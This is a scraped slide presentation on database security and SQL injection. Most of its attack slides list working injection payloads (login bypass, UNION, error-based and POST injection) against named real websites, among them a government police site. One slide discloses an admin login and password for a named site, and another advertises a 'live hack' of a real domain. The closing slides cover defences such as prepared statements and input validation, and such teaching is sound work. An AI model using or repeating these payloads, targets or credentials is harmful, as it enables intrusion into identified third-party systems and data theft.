Upload
rummy-khan
View
1.185
Download
26
Embed Size (px)
DESCRIPTION
Database and Database Security..
Citation preview
DATABASE & DATABASE SECURITY
BYREHAN MANZOOR
What actually is a database
Code and Filing concept
+
History of Database
Major Database Vendors
Interaction with Database
How we Interact (Direct Queries)
Custom defined functions
Stored Procedures
Stored Procedures
Integration with Languages
Static Apps
Dynamic Apps
Need in CMS
How We Integrate
Well that is the real question how we integrate.. It create a problem when we don’t attach app with a database correctly.. Code is important
Contents continued..
Database Attacks What is a Database Attack Explanation OWASP Rating (damage rate) Destruction of SQL injection
History Reviews Recent bidding in underground
Database Attacks
Excessive Privileges Privileges abuse Unauthorized privilege elevation Platform Vulnerabilities Sql Injection Weak Audit Denial of Service
Top 10 vuln by OWASP
Destruction of SQL Injection Attack Heartland Payment Systems
This New Jersey payment processing firm lost data on tens of millions of credit cards in an attack in 2009. Around 175,000 businesses were affected by the theft.
TJXMore than 45 million people had their credit card details stolen and some experts said the actual figure was likely to be closer to 94 million.
Recent Bidding in Underground
Login on Live Sites
http://www.equinet.ch/fr/gestion/login.php 1' OR '1'='1
http://lionsclubofwashim.co.in/admin.php 1' OR '1'='1
admin.axilbusiness.in 1' OR '1'='1
http://www.anemos.in/admin/ 1' OR '1'='1
Query Code
CODEselect username, password from admin where username='"+txtUserName.Text+"' and password='"+txtPassword.Text+"';
Union based attack
http://greenforce.com.pk/page.aspx?page_id=24 +UNION+ALL+SELECT+null,null,@@version,null,null,null,null-- -
http://www.philatourism.com/page.aspx?id=-3 UNION ALL SELECT table_name,null,null,null,null,null from information_schema.tables—
http://www.sharan.org.uk/newsdetail.aspx?ID=-7 union all select '1',null –
Codeselect * from tblName where id=‘”+RequestQueryString[‘id’]+”’;
Error Based Attack
http://www.vdjs.edu.in/CMS/ContentPage.aspx?id=21 and @@version>1-- -
http://www.mission-education.org/resourcelist.cfm?audience_ID=5 and 1=convert(int,@@version)-- -&category_id=2
http://www.grabbbit.com/Product.aspx?console_id=3' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='adminlogin' and column_name not in ('id','userid','password','admin_role_id')))--&type=Preown
http://www.grabbbit.com/admin/login.aspx userid admin password grabbbit$
Code Select column1,column2,column3, from table1 join table2 on table1.column1 =
table2.column1 where id=‘”+RequestQueryString[‘id’]+”’;
Blind Attack
fgcineplex.com.sg/Images/slideshow/sizzlingsoul.php
Codewell query is same here like union but problem is with labels here.. Their designer could are not picked.. Either they are also stored in database or they they cannot work with union
POST Sql Injection
url: http://haryanapolice.gov.in/police/pressreleases/s
earch.asp
Post text1=rummy'&text2=11/11/2010&SUBMIT=sea
rch
Codeselect * from tablename where text1= Request.Form[“text1"].ToString() and text2= Request.Form[“text1"].ToString();
Why Sql Injection Possible
Who is responsible Database or Programmer
Why Not To Blame Database Database Secure Nature Lack of awareness No research base study Lack of interest Non professional coders
Detection of SQL Injection
Manual Check Why How By Whom
Automated Check Tools Scanners
Securing From SQL Injection
Learn About it Firewalls By Code Don’t Disclose any parameter as possible Giving session user least possible rights Blacklisting evil keywords for the session
user User input validation Using prepared statements
More on Firewalls
USE Of Firewall As it is Customized Buffer overflows Null bytes Difference between a normal user and
Hacker
Buffer Overflows
Live example
https://www.qmensolutions.com/remote_support_packs.php?packs=9%27--%20-
Bypassing from keyword
Live Hack Of A Website
http://aquaservices.co.in/
Conclusion
Although databases and their contents are vulnerable to a host of internal and external threats, it is possible to reduce the attack vectors to near zero. By addressing these threats you will meet the requirements of the most regulated industries in the world.